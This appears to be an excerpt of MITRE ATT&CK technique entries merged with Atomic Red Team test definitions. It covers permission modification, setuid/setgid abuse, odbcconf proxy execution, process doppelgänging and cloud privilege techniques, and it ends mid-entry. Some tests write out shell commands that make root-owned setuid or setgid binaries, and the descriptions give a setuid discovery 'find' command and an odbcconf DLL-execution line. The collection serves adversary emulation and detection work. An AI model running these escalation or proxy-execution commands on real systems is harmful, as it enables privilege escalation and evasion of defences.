https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 - source_name: Hybrid Analysis Icacls2 May 2018 description: Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018. url: https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 - source_name: bad_luck_blackcat description: Kaspersky Global Research & Analysis Team (GReAT). (2022). A Bad Luck BlackCat. Retrieved May 5, 2022. url: https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf - source_name: fsutil_behavior description: Microsoft. (2021, September 27). fsutil behavior. 
Retrieved January 14, 2022. url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior - source_name: EventTracker File Permissions Feb 2014 description: Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018. url: https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/ - source_name: blackmatter_blackcat description: 'Pereira, T. Huey, C. (2022, March 17). From BlackMatter to BlackCat: Analyzing two attacks from one affiliate. Retrieved May 5, 2022.' url: https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html - source_name: new_rust_based_ransomware description: 'Symantec Threat Hunter Team. (2021, December 16). Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware. Retrieved January 14, 2022.' url: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:52.570Z' name: File and Directory Permissions Modification description: "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. 
This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).\n\nAdversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - CrowdStrike Falcon OverWatch - Jan Miller, CrowdStrike x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - ESXi - Linux - macOS - Windows x_mitre_version: '2.3' identifier: T1222 atomic_tests: [] T1027.016: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--671cd17f-a765-48fd-adc4-dad1941b1ae3 created: '2025-03-04T21:38:49.913Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/016 external_id: T1027.016 - source_name: ReasonLabs description: ReasonLabs. (n.d.). What is Dead code insertion?. Retrieved March 4, 2025. 
url: https://cyberpedia.reasonlabs.com/EN/dead%20code%20insertion.html - source_name: ReasonLabs Cyberpedia Junk Code description: What is Junk Code?. (n.d.). ReasonLabs. Retrieved April 4, 2025. url: https://cyberpedia.reasonlabs.com/EN/junk%20code.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:37.495Z' name: Junk Code Insertion description: "Adversaries may use junk code / dead code to obfuscate a malware’s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with [Compression](https://attack.mitre.org/techniques/T1027/015) or [Software Packing](https://attack.mitre.org/techniques/T1027/002).(Citation: ReasonLabs)(Citation: ReasonLabs Cyberpedia Junk Code)\n\nNo-Operation (NOP) instructions are an example of dead code commonly used in x86 assembly language. They are commonly encoded as the 0x90 opcode. When NOPs are added to malware, the disassembler may show the NOP instructions, leading to the analyst needing to step through them.(Citation: ReasonLabs)\n\nThe use of junk / dead code insertion is distinct from [Binary Padding](https://attack.mitre.org/techniques/T1027/001) because the purpose is to obfuscate the functionality of the code, rather than simply to change the malware’s signature. 
" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Joas Antonio dos Santos, @C0d3Cr4zy x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.0' atomic_tests: [] T1548: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b created: '2020-01-30T13:58:14.373Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1548 external_id: T1548 - source_name: TechNet How UAC Works description: Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016. url: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works - source_name: OSX Keydnap malware description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017. url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ - source_name: Fortinet Fareit description: Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016. url: https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware - source_name: sudo man page 2018 description: Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018. url: https://www.sudo.ws/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:53.277Z' name: Abuse Elevation Control Mechanism description: 'Adversaries may circumvent mechanisms designed to control the elevation of privileges in order to gain higher-level permissions. 
Most modern systems contain native elevation control mechanisms that are intended to limit the privileged actions a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)' kill_chain_phases: - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows - IaaS - Office Suite - Identity Provider x_mitre_version: '1.5' atomic_tests: [] T1134.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf created: '2020-02-18T16:48:56.582Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1134/002 external_id: T1134.002 - source_name: Microsoft Command-line Logging description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017. url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing - source_name: Microsoft RunAs description: Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021. 
url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11) object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:53.370Z' name: Create Process with Token description: |- Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs) Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process. While this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process. 
kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Vadim Khrykov - Jonny Johnson x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.3' identifier: T1134.002 atomic_tests: [] T1548.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9 created: '2020-01-30T14:11:41.212Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1548/001 external_id: T1548.001 - source_name: GTFOBins Suid description: Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January 28, 2022. url: https://gtfobins.github.io/#+suid - source_name: OSX Keydnap malware description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017. url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ - source_name: setuid man page description: Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018. url: http://man7.org/linux/man-pages/man2/setuid.2.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:53.456Z' name: 'Abuse Elevation Control Mechanism: Setuid and Setgid' description: |- An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. 
On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can set the setuid or setgid flag on their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file], or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used. Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions. Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setgid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid (GNU find no longer accepts the +mode form; use -perm /4000 and -perm /2000 there). 
Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '1.2' identifier: T1548.001 atomic_tests: - name: Make and modify binary from C source auto_generated_guid: 896dfe97-ae43-4101-8e96-9a7996555d80 description: 'Make, change owner, and change file attributes on a C source code file ' supported_platforms: - macos - linux input_arguments: payload: description: hello.c payload type: path default: PathToAtomicsFolder/T1548.001/src/hello.c executor: command: | cp #{payload} /tmp/hello.c sudo chown root /tmp/hello.c sudo make /tmp/hello sudo chown root /tmp/hello sudo chmod u+s /tmp/hello /tmp/hello cleanup_command: | sudo rm /tmp/hello sudo rm /tmp/hello.c name: sh elevation_required: true - name: Set a SetUID flag on file auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in FreeBSD. ' supported_platforms: - macos - linux input_arguments: file_to_setuid: description: Path of file to set SetUID flag type: path default: "/tmp/evilBinary" executor: command: | sudo touch #{file_to_setuid} sudo chown root #{file_to_setuid} sudo chmod u+xs #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} ' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. 
' supported_platforms: - macos - linux input_arguments: file_to_setuid: description: Path of file to set SetGID flag type: path default: "/tmp/evilBinary" executor: command: | sudo touch #{file_to_setuid} sudo chown root #{file_to_setuid} sudo chmod g+xs #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} ' name: sh elevation_required: true T1218.008: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071 created: '2020-01-24T15:01:32.917Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/008 external_id: T1218.008 - source_name: Microsoft odbcconf.exe description: Microsoft. (2017, January 18). ODBCCONF.EXE. Retrieved March 7, 2019. url: https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017 - source_name: LOLBAS Odbcconf description: LOLBAS. (n.d.). Odbcconf.exe. Retrieved March 7, 2019. url: https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - source_name: TrendMicro Squiblydoo Aug 2017 description: Bermejo, L., Giagone, R., Wu, R., and Yarochkin, F. (2017, August 7). Backdoor-carrying Emails Set Sights on Russian-speaking Businesses. Retrieved March 7, 2019. url: https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/ - source_name: TrendMicro Cobalt Group Nov 2017 description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.' 
url: https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:55.622Z' name: 'Signed Binary Proxy Execution: Odbcconf' description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1218.008 atomic_tests: [] T1548.005: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c created: '2023-07-10T16:37:15.672Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1548/005 external_id: T1548.005 - source_name: AWS PassRole description: AWS. (n.d.). Granting a user permissions to pass a role to an AWS service. Retrieved July 10, 2023. 
url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html - source_name: CrowdStrike StellarParticle January 2022 description: 'CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.' url: https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/ - source_name: Google Cloud Just in Time Access 2023 description: Google Cloud. (n.d.). Manage just-in-time privileged access to projects. Retrieved September 21, 2023. url: https://cloud.google.com/architecture/manage-just-in-time-privileged-access-to-project - source_name: Google Cloud Service Account Authentication Roles description: Google Cloud. (n.d.). Roles for service account authentication. Retrieved July 10, 2023. url: https://cloud.google.com/iam/docs/service-account-permissions - source_name: Microsoft Impersonation and EWS in Exchange description: Microsoft. (2022, September 13). Impersonation and EWS in Exchange. Retrieved July 10, 2023. url: https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-ews-in-exchange - source_name: Azure Just in Time Access 2023 description: Microsoft. (2023, August 29). Configure and approve just-in-time access for Azure Managed Applications. Retrieved September 21, 2023. url: https://learn.microsoft.com/en-us/azure/azure-resource-manager/managed-applications/approve-just-in-time-access - source_name: Rhino Security Labs AWS Privilege Escalation description: Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022. url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ - source_name: Rhino Google Cloud Privilege Escalation description: Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform – Part 1 (IAM). Retrieved September 21, 2023. 
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ - source_name: Hunters Domain Wide Delegation Google Workspace 2023 description: 'Yonatan Khanashvilli. (2023, November 28). DeleFriend: Severe design flaw in Domain Wide Delegation could leave Google Workspace vulnerable for takeover. Retrieved January 16, 2024.' url: https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover - source_name: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023 description: Zohar Zigdon. (2023, November 30). Exploring a Critical Risk in Google Workspace's Domain-Wide Delegation Feature. Retrieved January 16, 2024. url: https://unit42.paloaltonetworks.com/critical-risk-in-google-workspace-delegation-feature/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T23:15:17.608Z' name: Temporary Elevated Cloud Access description: "Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. \n\nJust-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Azure Just in Time Access 2023)\n\nAccount impersonation allows user or service accounts to temporarily act with the permissions of another account. 
For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) \n\nMany cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)\n\nWhile users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. 
This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)\n\n**Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Arad Inbar, Fidelis Security x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS - Office Suite - Identity Provider x_mitre_version: '1.2' atomic_tests: [] T1055.013: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197 created: '2020-01-14T17:19:50.978Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1055/013 external_id: T1055.013 - source_name: Microsoft TxF description: Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017. 
url: https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx - source_name: Microsoft Basic TxF Concepts description: Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017. url: https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx - source_name: Microsoft Where to use TxF description: Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017. url: https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx - source_name: BlackHat Process Doppelgänging Dec 2017 description: 'Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelgänging. Retrieved December 20, 2017.' url: https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf - source_name: hasherezade Process Doppelgänging Dec 2017 description: hasherezade. (2017, December 18). Process Doppelgänging – a new way to impersonate a process. Retrieved December 20, 2017. url: https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/ - source_name: Microsoft PsSetCreateProcessNotifyRoutine routine description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017. url: https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:56.422Z' name: Process Doppelgänging description: "Adversaries may inject malicious code into a process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. 
Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may abuse TxF to perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load – Create a shared section of memory and load the malicious executable.\n* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate – Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context of) the injecting process. 
However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' atomic_tests: [] T1578.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4 created: '2020-06-16T17:23:06.508Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1578/003 external_id: T1578.003 - source_name: AWS CloudTrail Search description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020. url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/ - source_name: Cloud Audit Logs description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020. url: https://cloud.google.com/logging/docs/audit#admin-activity - source_name: Mandiant M-Trends 2020 description: Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf - source_name: Azure Activity Logs description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020. 
url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:56.705Z' name: Delete Cloud Instance description: |- An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable. An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Arun Seelagan, CISA x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS x_mitre_version: '1.2' atomic_tests: [] T1574.005: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979 created: '2020-03-13T11:12:18.558Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/005 external_id: T1574.005 - source_name: mozilla_sec_adv_2012 description: Robert Kugler. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017. url: https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/ - source_name: Executable Installers are Vulnerable description: 'Stefan Kanthak. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege. 
